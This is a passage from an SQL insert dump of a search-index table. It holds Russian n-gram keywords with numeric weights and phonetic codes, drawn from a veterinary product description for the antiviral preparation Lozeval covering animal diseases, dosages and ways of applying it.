состав',0,1,1.2667,'и000',1,'*'),(1643382,'и состав раствор','и состав раствор',0,1,1.5333,'и000',1,'*'),(1643383,'или в','или в',0,1,1.1667,'и000',1,'*'),(1643384,'или в дозе','или в дозе',0,1,1.3333,'и000',1,'*'),(1643385,'или выпаивается','или выпаивается',0,1,1.5,'и000',1,'*'),(1643386,'или выпаивается в','или выпаивается в',0,1,1.5667,'и000',1,'*'),(1643387,'или закапывают','или закапывают',0,1,1.4667,'и000',1,'*'),(1643388,'или закапывают в','или закапывают в',0,1,1.5333,'и000',1,'*'),(1643389,'иммунитета','иммунитета',0,0,0.6667,'и000',1,'*'),(1643390,'иммунитета усиления','иммунитета усиления',0,1,1.6333,'и000',1,'*'),(1643391,'иммунитета усиления синтеза','иммунитета усиления синтеза',0,1,1.9,'и000',1,'*'),(1643392,'ингибирования','ингибирования',0,0,0.8667,'и000',1,'*'),(1643393,'ингибирования внутриклеточной','ингибирования внутриклеточной',0,1,1.9667,'и000',1,'*'),(1643394,'ингибирования внутриклеточной репродукции','ингибирования внутриклеточной репродукции',0,1,2,'и000',1,'*'),(1643395,'интервалом','интервалом',0,0,0.6667,'и000',1,'*'),(1643396,'интервалом бактериальные','интервалом бактериальные',0,1,1.8,'и000',1,'*'),(1643397,'интервалом бактериальные инфекции','интервалом бактериальные инфекции',0,1,2,'и000',1,'*'),(1643398,'инфекции','инфекции',0,0,0.5333,'и000',1,'*'),(1643399,'инфекции аденовирусная','инфекции аденовирусная',0,1,1.7333,'и000',1,'*'),(1643400,'инфекции аденовирусная инфекция','инфекции аденовирусная инфекция',0,1,2,'и000',1,'*'),(1643401,'инфекции животных','инфекции животных',0,1,1.5667,'и000',1,'*'),(1643402,'инфекции животных и','инфекции животных и',0,1,1.6333,'и000',1,'*'),(1643403,'инфекционный','инфекционный',0,0,0.8,'и000',1,'*'),(1643404,'инфекционный бронхит','инфекционный бронхит',0,1,1.6667,'и000',1,'*'),(1643405,'инфекционный бронхит кур','инфекционный бронхит кур',0,1,1.8,'и000',1,'*'),(1643406,'инфекция','инфекция',0,0,0.5333,'и000',1,'*'),(1643407,'инфекция парагрипп-3','инфекция парагрипп-3',0,1,1.6667,'и000',1,'*'),(1643408,'инфекция парагрипп-3 ринотрахеит','инфекция парагрипп-3 ринотрахеит',0,1,2,'и000',1,'*'),(1643409,'к грамположительной','к грамположительной',0,1,1.6333,'к000',1,'*'),(1643410,'к грамположительной и','к грамположительной и',0,1,1.7,'к000',1,'*'),(1643411,'капли','капли',0,0,0.3333,'к000',1,'*'),(1643412,'капли без','капли без',0,1,1.3,'к000',1,'*'),(1643413,'капли без разведения','капли без разведения',0,1,1.6667,'к000',1,'*'),(1643414,'кастрации','кастрации',0,0,0.6,'к000',1,'*'),(1643415,'кастрации и','кастрации и',0,1,1.3667,'к000',1,'*'),(1643416,'кастрации и косметических','кастрации и косметических',0,1,1.8333,'к000',1,'*'),(1643417,'кг массы 1','кг массы 1',0,1,1.3333,'к000',1,'*'),(1643418,'кг массы 1-2','кг массы 1-2',0,1,1.4,'к000',1,'*'),(1643419,'клеточного','клеточного',0,0,0.6667,'к000',1,'*'),(1643420,'клеточного и','клеточного и',0,1,1.4,'к000',1,'*'),(1643421,'клеточного и гуморального','клеточного и гуморального',0,1,1.8333,'к000',1,'*'),(1643422,'кожные','кожные',0,0,0.4,'к000',1,'*'),(1643423,'кожные заболевания','кожные заболевания',0,1,1.6,'к000',1,'*'),(1643424,'кожные заболевания дерматит','кожные заболевания дерматит',0,1,1.9,'к000',1,'*'),(1643425,'колибактериоз','колибактериоз',0,0,0.8667,'к000',1,'*'),(1643426,'колибактериоз стрептококкоз','колибактериоз стрептококкоз',0,1,1.9,'к000',1,'*'),(1643427,'колибактериоз стрептококкоз стафилококкоз','колибактериоз стрептококкоз стафилококкоз',0,1,2,'к000',1,'*'),(1643428,'концентрации 1-2','концентрации 1-2',0,1,1.5333,'к000',1,'*'),(1643429,'концентрации 1-2 мл','концентрации 1-2 мл',0,1,1.6333,'к000',1,'*'),(1643430,'кормом или','кормом или',0,1,1.3333,'к000',1,'*'),(1643431,'кормом или выпаивается','кормом или выпаивается',0,1,1.7333,'к000',1,'*'),(1643432,'косметических','косметических',0,0,0.8667,'к000',1,'*'),(1643433,'косметических операциях','косметических операциях',0,1,1.7667,'к000',1,'*'),(1643434,'косметических операциях раненая','косметических операциях раненая',0,1,2,'к000',1,'*'),(1643435,'кошек','кошек',0,0,0.3333,'к000',1,'*'),(1643436,'кошек 1-2','кошек 1-2',0,1,1.3,'к000',1,'*'),(1643437,'кошек 1-2 мл','кошек 1-2 мл',0,1,1.4,'к000',1,'*'),(1643438,'кур','кур',0,0,0.2,'к000',1,'*'),(1643439,'кур чума','кур чума',0,1,1.2667,'к000',1,'*'),(1643440,'кур чума плотоядных','кур чума плотоядных',0,1,1.6333,'к000',1,'*'),(1643441,'курс','курс',0,0,0.2667,'к000',1,'*'),(1643442,'курс повторяют','курс повторяют',0,1,1.4667,'к000',1,'*'),(1643443,'курс повторяют респираторные','курс повторяют респираторные',0,1,1.9333,'к000',1,'*'),(1643444,'курс повторяют спрофилактической','курс повторяют спрофилактической',0,1,2,'к000',1,'*'),(1643445,'лечения вирусных','лечения вирусных',0,1,1.5333,'л000',1,'*'),(1643446,'лечения вирусных и','лечения вирусных и',0,1,1.6,'л000',1,'*'),(1643447,'лизоцима','лизоцима',0,0,0.5333,'л000',1,'*'),(1643448,'лизоцима применение','лизоцима применение',0,1,1.6333,'л000',1,'*'),(1643449,'лизоцима применение назначение','лизоцима применение назначение',0,1,2,'л000',1,'*'),(1643450,'лозеваль','лозеваль',0,0,0.5333,'л000',1,'*'),(1643451,'лозеваль повышает','лозеваль повышает',0,1,1.5667,'л000',1,'*'),(1643452,'лозеваль повышает резистентность','лозеваль повышает резистентность',0,1,2,'л000',1,'*'),(1643453,'лозеваль противовірусний','лозеваль противовірусний',0,1,1.8,'л000',1,'*'),(1643454,'лозеваль противовірусний препарат','лозеваль противовірусний препарат',0,1,2,'л000',1,'*'),(1643455,'лозеваль противовирусный','лозеваль противовирусный',0,1,1.8,'л000',1,'*'),(1643456,'лозеваль противовирусный 100','лозеваль противовирусный 100',0,1,1.9333,'л000',1,'*'),(1643457,'м3','м3',0,0,0.1333,'м000',1,'*'),(1643458,'м3 с','м3 с',0,1,1.1333,'м000',1,'*'),(1643459,'м3 с экспозицией','м3 с экспозицией',0,1,1.5333,'м000',1,'*'),(1643460,'марека','марека',0,0,0.4,'м000',1,'*'),(1643461,'марека инфекционный','марека инфекционный',0,1,1.6333,'м000',1,'*'),(1643462,'марека инфекционный бронхит','марека инфекционный бронхит',0,1,1.9,'м000',1,'*'),(1643463,'маслом','маслом',0,0,0.4,'м000',1,'*'),(1643464,'маслом или','маслом или',0,1,1.3333,'м000',1,'*'),(1643465,'маслом или в','маслом или в',0,1,1.4,'м000',1,'*'),(1643466,'массы 1','массы 1',0,1,1.2333,'м000',1,'*'),(1643467,'массы 1 раз','массы 1 раз',0,1,1.3667,'м000',1,'*'),(1643468,'массы 1-2','массы 1-2',0,1,1.3,'м000',1,'*'),(1643469,'массы 1-2 раза','массы 1-2 раза',0,1,1.4667,'м000',1,'*'),(1643470,'массы тела без','массы тела без',0,1,1.4667,'м000',1,'*'),(1643471,'маститах','маститах',0,0,0.5333,'м000',1,'*'),(1643472,'маститах препарат','маститах препарат',0,1,1.5667,'м000',1,'*'),(1643473,'маститах препарат втирается','маститах препарат втирается',0,1,1.9,'м000',1,'*'),(1643474,'места','места',0,0,0.3333,'м000',1,'*'),(1643475,'места смазывают','места смазывают',0,1,1.5,'м000',1,'*'),(1643476,'места смазывают 2-3','места смазывают 2-3',0,1,1.6333,'м000',1,'*'),(1643477,'микрофлоре','микрофлоре',0,0,0.6667,'м000',1,'*'),(1643478,'микрофлоре лозеваль','микрофлоре лозеваль',0,1,1.6333,'м000',1,'*'),(1643479,'микрофлоре лозеваль повышает','микрофлоре лозеваль повышает',0,1,1.9333,'м000',1,'*'),(1643480,'мин','мин',0,0,0.2,'м000',1,'*'),(1643481,'мин кожные','мин кожные',0,1,1.3333,'м000',1,'*'),(1643482,'мин кожные заболевания','мин кожные заболевания',0,1,1.7333,'м000',1,'*'),(1643483,'мл м3','мл м3',0,1,1.1667,'м000',1,'*'),(1643484,'мл м3 с','мл м3 с',0,1,1.2333,'м000',1,'*'),(1643485,'мл на','мл на',0,1,1.1667,'м000',1,'*'),(1643486,'мл на 10','мл на 10',0,1,1.2667,'м000',1,'*'),(1643487,'мл препарат','мл препарат',0,1,1.3667,'м000',1,'*'),(1643488,'мл препарат для','мл препарат для',0,1,1.5,'м000',1,'*'),(1643489,'мл фармакологические','мл фармакологические',0,1,1.6667,'м000',1,'*'),(1643490,'мл фармакологические свойства','мл фармакологические свойства',0,1,1.9667,'м000',1,'*'),(1643491,'моконуклеаров','моконуклеаров',0,0,0.8667,'м000',1,'*'),(1643492,'моконуклеаров и','моконуклеаров и',0,1,1.5,'м000',1,'*'),(1643493,'моконуклеаров и повышения','моконуклеаров и повышения',0,1,1.8333,'м000',1,'*'),(1643494,'назначение','назначение',0,0,0.6667,'н000',1,'*'),(1643495,'назначение доза','назначение доза',0,1,1.5,'н000',1,'*'),(1643496,'назначение доза особенности','назначение доза особенности',0,1,1.9,'н000',1,'*'),(1643497,'наружно','наружно',0,0,0.4667,'н000',1,'*'),(1643498,'наружно до','наружно до',0,1,1.3333,'н000',1,'*'),(1643499,'наружно до полного','наружно до полного',0,1,1.6,'н000',1,'*'),(1643500,'наружного','наружного',0,0,0.6,'н000',1,'*'),(1643501,'наружного и','наружного и',0,1,1.3667,'н000',1,'*'),(1643502,'наружного и аэрозольного','наружного и аэрозольного',0,1,1.8,'н000',1,'*'),(1643503,'не выявлено','не выявлено',0,1,1.3667,'н000',1,'*'),(1643504,'не оказывает','не оказывает',0,1,1.4,'н000',1,'*'),(1643505,'не оказывает противопоказания','не оказывает противопоказания',0,1,1.9667,'н000',1,'*'),(1643506,'недельным','недельным',0,0,0.6,'н000',1,'*'),(1643507,'недельным интервалом','недельным интервалом',0,1,1.6667,'н000',1,'*'),(1643508,'недельным интервалом бактериальные','недельным интервалом бактериальные',0,1,2,'н000',1,'*'),(1643509,'необходимости','необходимости',0,0,0.8667,'н000',1,'*'),(1643510,'необходимости курс','необходимости курс',0,1,1.6,'н000',1,'*'),(1643511,'необходимости курс повторяют','необходимости курс повторяют',0,1,1.9333,'н000',1,'*'),(1643512,'носовые','носовые',0,0,0.4667,'н000',1,'*'),(1643513,'носовые ходы','носовые ходы',0,1,1.4,'н000',1,'*'),(1643514,'носовые ходы применяется','носовые ходы применяется',0,1,1.8,'н000',1,'*'),(1643515,'ньюкасла','ньюкасла',0,0,0.5333,'н000',1,'*'),(1643516,'ньюкасла болезнь','ньюкасла болезнь',0,1,1.5333,'н000',1,'*'),(1643517,'ньюкасла болезнь марека','ньюкасла болезнь марека',0,1,1.7667,'н000',1,'*'),(1643518,'обладает','обладает',0,0,0.5333,'о000',1,'*'),(1643519,'обладает бактериостатическими','обладает бактериостатическими',0,1,1.9667,'о000',1,'*'),(1643520,'обладает бактериостатическими и','обладает бактериостатическими и',0,1,2,'о000',1,'*'),(1643521,'обработок','обработок',0,0,0.6,'о000',1,'*'),(1643522,'обработок помещения','обработок помещения',0,1,1.6333,'о000',1,'*'),(1643523,'обработок помещения в','обработок помещения в',0,1,1.7,'о000',1,'*'),(1643524,'ожоги','ожоги',0,0,0.3333,'о000',1,'*'),(1643525,'ожоги гнойные','ожоги гнойные',0,1,1.4333,'о000',1,'*'),(1643526,'ожоги гнойные раны','ожоги гнойные раны',0,1,1.6,'о000',1,'*'),(1643527,'оказывает','оказывает',0,0,0.6,'о000',1,'*'),(1643528,'оказывает противопоказания','оказывает противопоказания',0,1,1.8667,'о000',1,'*'),(1643529,'оказывает противопоказания не','оказывает противопоказания не',0,1,1.9667,'о000',1,'*'),(1643530,'операциях','операциях',0,0,0.6,'о000',1,'*'),(1643531,'операциях раненая','операциях раненая',0,1,1.5667,'о000',1,'*'),(1643532,'операциях раненая поверхность','операциях раненая поверхность',0,1,1.9667,'о000',1,'*'),(1643533,'описание','описание',0,0,0.5333,'о000',1,'*'),(1643534,'описание и','описание и',0,1,1.3333,'о000',1,'*'),(1643535,'описание и состав','описание и состав',0,1,1.5667,'о000',1,'*'),(1643536,'организма','организма',0,0,0.6,'о000',1,'*'),(1643537,'организма животных','организма животных',0,1,1.6,'о000',1,'*'),(1643538,'организма животных и','организма животных и',0,1,1.6667,'о000',1,'*'),(1643539,'организма у','организма у',0,1,1.3667,'о000',1,'*'),(1643540,'организма у животных','организма у животных',0,1,1.6667,'о000',1,'*'),(1643541,'особенности','особенности',0,0,0.7333,'о000',1,'*'),(1643542,'особенности вирусные','особенности вирусные',0,1,1.6667,'о000',1,'*'),(1643543,'особенности вирусные инфекции','особенности вирусные инфекции',0,1,1.9667,'о000',1,'*'),(1643544,'отиты','отиты',0,0,0.3333,'о000',1,'*'),(1643545,'отиты препарат','отиты препарат',0,1,1.4667,'о000',1,'*'),(1643546,'отиты препарат разводят','отиты препарат разводят',0,1,1.7667,'о000',1,'*'),(1643547,'отношению','отношению',0,0,0.6,'о000',1,'*'),(1643548,'отношению к','отношению к',0,1,1.3667,'о000',1,'*'),(1643549,'отношению к грамположительной','отношению к грамположительной',0,1,1.9667,'о000',1,'*'),(1643550,'панлейкемия','панлейкемия',0,0,0.7333,'п000',1,'*'),(1643551,'панлейкемия кошек','панлейкемия кошек',0,1,1.5667,'п000',1,'*'),(1643552,'панлейкемия кошек 1-2','панлейкемия кошек 1-2',0,1,1.7,'п000',1,'*'),(1643553,'парагрипп-3','парагрипп-3',0,0,0.7333,'п000',1,'*'),(1643554,'парагрипп-3 ринотрахеит','парагрипп-3 ринотрахеит',0,1,1.7667,'п000',1,'*'),(1643555,'парагрипп-3 ринотрахеит болезнь','парагрипп-3 ринотрахеит болезнь',0,1,2,'п000',1,'*'),(1643556,'паратиф','паратиф',0,0,0.4667,'п000',1,'*'),(1643557,'паратиф колибактериоз','паратиф колибактериоз',0,1,1.7,'п000',1,'*'),(1643558,'паратиф колибактериоз стрептококкоз','паратиф колибактериоз стрептококкоз',0,1,2,'п000',1,'*'),(1643559,'парвовирусный','парвовирусный',0,0,0.8667,'п000',1,'*'),(1643560,'парвовирусный энтерит','парвовирусный энтерит',0,1,1.7,'п000',1,'*'),(1643561,'парвовирусный энтерит собак','парвовирусный энтерит собак',0,1,1.9,'п000',1,'*'),(1643562,'пастереллез','пастереллез',0,0,0.7333,'п000',1,'*'),(1643563,'пастереллез 1-2','пастереллез 1-2',0,1,1.5,'п000',1,'*'),(1643564,'пастереллез 1-2 мл','пастереллез 1-2 мл',0,1,1.6,'п000',1,'*'),(1643565,'перерыва','перерыва',0,0,0.5333,'п000',1,'*'),(1643566,'перерыва при','перерыва при',0,1,1.4,'п000',1,'*'),(1643567,'перерыва при необходимости','перерыва при необходимости',0,1,1.8667,'п000',1,'*'),(1643568,'плотоядных','плотоядных',0,0,0.6667,'п000',1,'*'),(1643569,'плотоядных парвовирусный','плотоядных парвовирусный',0,1,1.8,'п000',1,'*'),(1643570,'плотоядных парвовирусный энтерит','плотоядных парвовирусный энтерит',0,1,2,'п000',1,'*'),(1643571,'по 2-3','по 2-3',0,1,1.2,'п000',1,'*'),(1643572,'по 2-3 капли','по 2-3 капли',0,1,1.4,'п000',1,'*'),(1643573,'по отношению','по отношению',0,1,1.4,'п000',1,'*'),(1643574,'по отношению к','по отношению к',0,1,1.4667,'п000',1,'*'),(1643575,'побочные','побочные',0,0,0.5333,'п000',1,'*'),(1643576,'побочные действия','побочные действия',0,1,1.5667,'п000',1,'*'),(1643577,'побочные действия в','побочные действия в',0,1,1.6333,'п000',1,'*'),(1643578,'поверхность','поверхность',0,0,0.7333,'п000',1,'*'),(1643579,'поверхность смазывается','поверхность смазывается',0,1,1.7667,'п000',1,'*'),(1643580,'поверхность смазывается 2-3','поверхность смазывается 2-3',0,1,1.9,'п000',1,'*'),(1643581,'повторяют','повторяют',0,0,0.6,'п000',1,'*'),(1643582,'повторяют респираторные','повторяют респираторные',0,1,1.7667,'п000',1,'*'),(1643583,'повторяют респираторные заболевания','повторяют респираторные заболевания',0,1,2,'п000',1,'*'),(1643584,'повторяют спрофилактической','повторяют спрофилактической',0,1,1.9,'п000',1,'*'),(1643585,'повторяют спрофилактической целью','повторяют спрофилактической целью',0,1,2,'п000',1,'*'),(1643586,'повышает','повышает',0,0,0.5333,'п000',1,'*'),(1643587,'повышает резистентность','повышает резистентность',0,1,1.7667,'п000',1,'*'),(1643588,'повышает резистентность организма','повышает резистентность организма',0,1,2,'п000',1,'*'),(1643589,'повышения','повышения',0,0,0.6,'п000',1,'*'),(1643590,'повышения уровня','повышения уровня',0,1,1.5333,'п000',1,'*'),(1643591,'повышения уровня лизоцима','повышения уровня лизоцима',0,1,1.8333,'п000',1,'*'),(1643592,'подряд','подряд',0,0,0.4,'п000',1,'*'),(1643593,'подряд с','подряд с',0,1,1.2667,'п000',1,'*'),(1643594,'подряд с недельным','подряд с недельным',0,1,1.6,'п000',1,'*'),(1643595,'подсолнечным','подсолнечным',0,0,0.8,'п000',1,'*'),(1643596,'подсолнечным маслом','подсолнечным маслом',0,1,1.6333,'п000',1,'*'),(1643597,'подсолнечным маслом или','подсолнечным маслом или',0,1,1.7667,'п000',1,'*'),(1643598,'полного','полного',0,0,0.4667,'п000',1,'*'),(1643599,'полного выздоровления','полного выздоровления',0,1,1.7,'п000',1,'*'),(1643600,'полного выздоровления в','полного выздоровления в',0,1,1.7667,'п000',1,'*'),(1643601,'полного выздоровления отиты','полного выздоровления отиты',0,1,1.9,'п000',1,'*'),(1643602,'помещения','помещения',0,0,0.6,'п000',1,'*'),(1643603,'помещения в','помещения в',0,1,1.3667,'п000',1,'*'),(1643604,'помещения в концентрации','помещения в концентрации',0,1,1.8,'п000',1,'*'),(1643605,'пораженные','пораженные',0,0,0.6667,'п000',1,'*'),(1643606,'пораженные доли','пораженные доли',0,1,1.5,'п000',1,'*'),(1643607,'пораженные доли 3-4','пораженные доли 3-4',0,1,1.6333,'п000',1,'*'),(1643608,'пораженные места','пораженные места',0,1,1.5333,'п000',1,'*'),(1643609,'пораженные места смазывают','пораженные места смазывают',0,1,1.8667,'п000',1,'*'),(1643610,'после','после',0,0,0.3333,'п000',1,'*'),(1643611,'после 3-х','после 3-х',0,1,1.3,'п000',1,'*'),(1643612,'после 3-х дневного','после 3-х дневного',0,1,1.6,'п000',1,'*'),(1643613,'после з-х','после з-х',0,1,1.3,'п000',1,'*'),(1643614,'после з-х дневного','после з-х дневного',0,1,1.6,'п000',1,'*'),(1643615,'практике','практике',0,0,0.5333,'п000',1,'*'),(1643616,'практике вводится','практике вводится',0,1,1.5667,'п000',1,'*'),(1643617,'практике вводится внутриматочно','практике вводится внутриматочно',0,1,2,'п000',1,'*'),(1643618,'препарат втирается','препарат втирается',0,1,1.6,'п000',1,'*'),(1643619,'препарат втирается в','препарат втирается в',0,1,1.6667,'п000',1,'*'),(1643620,'препарат для профилактики','препарат для профилактики',0,1,1.8333,'п000',1,'*'),(1643621,'препарат задается','препарат задается',0,1,1.5667,'п000',1,'*'),(1643622,'препарат задается в','препарат задается в',0,1,1.6333,'п000',1,'*'),(1643623,'препарат задается с','препарат задается с',0,1,1.6333,'п000',1,'*'),(1643624,'препарат разводят','препарат разводят',0,1,1.5667,'п000',1,'*'),(1643625,'препарат разводят 1','препарат разводят 1',0,1,1.6333,'п000',1,'*'),(1643626,'при кастрации','при кастрации',0,1,1.4333,'п000',1,'*'),(1643627,'при кастрации и','при кастрации и',0,1,1.5,'п000',1,'*'),(1643628,'при маститах','при маститах',0,1,1.4,'п000',1,'*'),(1643629,'при маститах препарат','при маститах препарат',0,1,1.7,'п000',1,'*'),(1643630,'при необходимости','при необходимости',0,1,1.5667,'п000',1,'*'),(1643631,'при необходимости курс','при необходимости курс',0,1,1.7333,'п000',1,'*'),(1643632,'применение назначение','применение назначение',0,1,1.7,'п000',1,'*'),(1643633,'применение назначение доза','применение назначение доза',0,1,1.8667,'п000',1,'*'),(1643634,'применения фасовка','применения фасовка',0,1,1.6,'п000',1,'*'),(1643635,'применения фасовка флакон','применения фасовка флакон',0,1,1.8333,'п000',1,'*'),(1643636,'применяется','применяется',0,0,0.7333,'п000',1,'*'),(1643637,'применяется для','применяется для',0,1,1.5,'п000',1,'*'),(1643638,'применяется для аэрозольных','применяется для аэрозольных',0,1,1.9,'п000',1,'*'),(1643639,'применяют до','применяют до',0,1,1.4,'п000',1,'*'),(1643640,'применяют до заживления','применяют до заживления',0,1,1.7667,'п000',1,'*'),(1643641,'применяют наружно','применяют наружно',0,1,1.5667,'п000',1,'*'),(1643642,'применяют наружно до','применяют наружно до',0,1,1.6667,'п000',1,'*'),(1643643,'противовірусний','противовірусний',0,0,1,'п000',1,'*'),(1643644,'противовірусний препарат','противовірусний препарат',0,1,1.8,'п000',1,'*'),(1643645,'противовирусное','противовирусное',0,0,1,'п000',1,'*'),(1643646,'противовирусное действие','противовирусное действие',0,1,1.8,'п000',1,'*'),(1643647,'противовирусное действие за','противовирусное действие за',0,1,1.9,'п000',1,'*'),(1643648,'противовирусный','противовирусный',0,0,1,'п000',1,'*'),(1643649,'противовирусный 100','противовирусный 100',0,1,1.6333,'п000',1,'*'),(1643650,'противовирусный 100 мл','противовирусный 100 мл',0,1,1.7333,'п000',1,'*'),(1643651,'противопоказания не','противопоказания не',0,1,1.6333,'п000',1,'*'),(1643652,'противопоказания не выявлено','противопоказания не выявлено',0,1,1.9333,'п000',1,'*'),(1643653,'профилактики','профилактики',0,0,0.8,'п000',1,'*'),(1643654,'профилактики и','профилактики и',0,1,1.4667,'п000',1,'*'),(1643655,'профилактики и лечения','профилактики и лечения',0,1,1.7333,'п000',1,'*'),(1643656,'птиц','птиц',0,0,0.2667,'п000',1,'*'),(1643657,'птиц за','птиц за',0,1,1.2333,'п000',1,'*'),(1643658,'птиц за счет','птиц за счет',0,1,1.4,'п000',1,'*'),(1643659,'птиц описание','птиц описание',0,1,1.4333,'п000',1,'*'),(1643660,'птиц описание и','птиц описание и',0,1,1.5,'п000',1,'*'),(1643661,'птиц паратиф','птиц паратиф',0,1,1.4,'п000',1,'*'),(1643662,'птиц паратиф колибактериоз','птиц паратиф колибактериоз',0,1,1.8667,'п000',1,'*'),(1643663,'раз','раз',0,0,0.2,'р000',1,'*'),(1643664,'раз в','раз в',0,1,1.1667,'р000',1,'*'),(1643665,'раз в день','раз в день',0,1,1.3333,'р000',1,'*'),(1643666,'раз в сутки','раз в сутки',0,1,1.3667,'р000',1,'*'),(1643667,'раза в','раза в',0,1,1.2,'р000',1,'*'),(1643668,'раза в день','раза в день',0,1,1.3667,'р000',1,'*'),(1643669,'раза в сутки','раза в сутки',0,1,1.4,'р000',1,'*'),(1643670,'разведении','разведении',0,0,0.6667,'р000',1,'*'),(1643671,'разведении 1','разведении 1',0,1,1.4,'р000',1,'*'),(1643672,'разведении 1 1','разведении 1 1',0,1,1.4667,'р000',1,'*'),(1643673,'разведения','разведения',0,0,0.6667,'р000',1,'*'),(1643674,'разведения 2','разведения 2',0,1,1.4,'р000',1,'*'),(1643675,'разведения 2 раза','разведения 2 раза',0,1,1.5667,'р000',1,'*'),(1643676,'разведения при','разведения при',0,1,1.4667,'р000',1,'*'),(1643677,'разведения при маститах','разведения при маститах',0,1,1.7667,'р000',1,'*'),(1643678,'разводят','разводят',0,0,0.5333,'р000',1,'*'),(1643679,'разводят 1','разводят 1',0,1,1.3333,'р000',1,'*'),(1643680,'разводят 1 1','разводят 1 1',0,1,1.4,'р000',1,'*'),(1643681,'раненая','раненая',0,0,0.4667,'р000',1,'*'),(1643682,'раненая поверхность','раненая поверхность',0,1,1.6333,'р000',1,'*'),(1643683,'раненая поверхность смазывается','раненая поверхность смазывается',0,1,2,'р000',1,'*'),(1643684,'раны','раны',0,0,0.2667,'р000',1,'*'),(1643685,'раны побочные','раны побочные',0,1,1.4333,'р000',1,'*'),(1643686,'раны побочные действия','раны побочные действия',0,1,1.7333,'р000',1,'*'),(1643687,'раны пораженные','раны пораженные',0,1,1.5,'р000',1,'*'),(1643688,'раны пораженные места','раны пораженные места',0,1,1.7,'р000',1,'*'),(1643689,'раствор для','раствор для',0,1,1.3667,'р000',1,'*'),(1643690,'раствор для внутреннего','раствор для внутреннего',0,1,1.7667,'р000',1,'*'),(1643691,'растворе','растворе',0,0,0.5333,'р000',1,'*'),(1643692,'растворе глюкозы','растворе глюкозы',0,1,1.5333,'р000',1,'*'),(1643693,'растворе глюкозы смазывают','растворе глюкозы смазывают',0,1,1.8667,'р000',1,'*'),(1643694,'резистентность','резистентность',0,0,0.9333,'р000',1,'*'),(1643695,'резистентность организма','резистентность организма',0,1,1.8,'р000',1,'*'),(1643696,'резистентность организма животных','резистентность организма животных',0,1,2,'р000',1,'*'),(1643697,'резистентность организма у','резистентность организма у',0,1,1.8667,'р000',1,'*'),(1643698,'рекомендуемых','рекомендуемых',0,0,0.8667,'р000',1,'*'),(1643699,'рекомендуемых дозах','рекомендуемых дозах',0,1,1.6333,'р000',1,'*'),(1643700,'рекомендуемых дозах не','рекомендуемых дозах не',0,1,1.7333,'р000',1,'*'),(1643701,'репродукции','репродукции',0,0,0.7333,'р000',1,'*'),(1643702,'репродукции вирусов','репродукции вирусов',0,1,1.6333,'р000',1,'*'),(1643703,'репродукции вирусов обладает','репродукции вирусов обладает',0,1,1.9333,'р000',1,'*'),(1643704,'респираторные','респираторные',0,0,0.8667,'р000',1,'*'),(1643705,'респираторные заболевания','респираторные заболевания',0,1,1.8333,'р000',1,'*'),(1643706,'респираторные заболевания препарат','респираторные заболевания препарат',0,1,2,'р000',1,'*'),(1643707,'ринотрахеит','ринотрахеит',0,0,0.7333,'р000',1,'*'),(1643708,'ринотрахеит болезнь','ринотрахеит болезнь',0,1,1.6333,'р000',1,'*'),(1643709,'ринотрахеит болезнь ньюкасла','ринотрахеит болезнь ньюкасла',0,1,1.9333,'р000',1,'*'),(1643710,'рожа','рожа',0,0,0.2667,'р000',1,'*'),(1643711,'рожа ожоги','рожа ожоги',0,1,1.3333,'р000',1,'*'),(1643712,'рожа ожоги гнойные','рожа ожоги гнойные',0,1,1.6,'р000',1,'*'),(1643713,'с кормом или','с кормом или',0,1,1.4,'с000',1,'*'),(1643714,'с недельным','с недельным',0,1,1.3667,'с000',1,'*'),(1643715,'с недельным интервалом','с недельным интервалом',0,1,1.7333,'с000',1,'*'),(1643716,'с подсолнечным','с подсолнечным',0,1,1.4667,'с000',1,'*'),(1643717,'с подсолнечным маслом','с подсолнечным маслом',0,1,1.7,'с000',1,'*'),(1643718,'с экспозицией','с экспозицией',0,1,1.4333,'с000',1,'*'),(1643719,'с экспозицией 45','с экспозицией 45',0,1,1.5333,'с000',1,'*'),(1643720,'свойства противовирусное','свойства противовирусное',0,1,1.8,'с000',1,'*'),(1643721,'свойства противовирусное действие','свойства противовирусное действие',0,1,2,'с000',1,'*'),(1643722,'свойствами','свойствами',0,0,0.6667,'с000',1,'*'),(1643723,'свойствами по','свойствами по',0,1,1.4333,'с000',1,'*'),(1643724,'свойствами по отношению','свойствами по отношению',0,1,1.7667,'с000',1,'*'),(1643725,'синтеза','синтеза',0,0,0.4667,'с000',1,'*'),(1643726,'синтеза моконуклеаров','синтеза моконуклеаров',0,1,1.7,'с000',1,'*'),(1643727,'синтеза моконуклеаров и','синтеза моконуклеаров и',0,1,1.7667,'с000',1,'*'),(1643728,'смазывается','смазывается',0,0,0.7333,'с000',1,'*'),(1643729,'смазывается 2-3','смазывается 2-3',0,1,1.5,'с000',1,'*'),(1643730,'смазывается 2-3 раза','смазывается 2-3 раза',0,1,1.6667,'с000',1,'*'),(1643731,'смазывают','смазывают',0,0,0.6,'с000',1,'*'),(1643732,'смазывают 2-3','смазывают 2-3',0,1,1.4333,'с000',1,'*'),(1643733,'смазывают 2-3 раза','смазывают 2-3 раза',0,1,1.6,'с000',1,'*'),(1643734,'смазывают или','смазывают или',0,1,1.4333,'с000',1,'*'),(1643735,'смазывают или закапывают','смазывают или закапывают',0,1,1.8,'с000',1,'*'),(1643736,'собак','собак',0,0,0.3333,'с000',1,'*'),(1643737,'собак панлейкемия','собак панлейкемия',0,1,1.5667,'с000',1,'*'),(1643738,'собак панлейкемия кошек','собак панлейкемия кошек',0,1,1.7667,'с000',1,'*'),(1643739,'состав раствор','состав раствор',0,1,1.4667,'с000',1,'*'),(1643740,'состав раствор для','состав раствор для',0,1,1.6,'с000',1,'*'),(1643741,'спирте','спирте',0,0,0.4,'с000',1,'*'),(1643742,'спирте или','спирте или',0,1,1.3333,'с000',1,'*'),(1643743,'спирте или закапывают','спирте или закапывают',0,1,1.7,'с000',1,'*'),(1643744,'спрофилактической','спрофилактической',0,0,1,'с000',1,'*'),(1643745,'спрофилактической целью','спрофилактической целью',0,1,1.7667,'с000',1,'*'),(1643746,'спрофилактической целью препарат','спрофилактической целью препарат',0,1,2,'с000',1,'*'),(1643747,'стафилококкоз','стафилококкоз',0,0,0.8667,'с000',1,'*'),(1643748,'стафилококкоз пастереллез','стафилококкоз пастереллез',0,1,1.8333,'с000',1,'*'),(1643749,'стафилококкоз пастереллез 1-2','стафилококкоз пастереллез 1-2',0,1,1.9667,'с000',1,'*'),(1643750,'стимулирования','стимулирования',0,0,0.9333,'с000',1,'*'),(1643751,'стимулирования клеточного','стимулирования клеточного',0,1,1.8333,'с000',1,'*'),(1643752,'стимулирования клеточного и','стимулирования клеточного 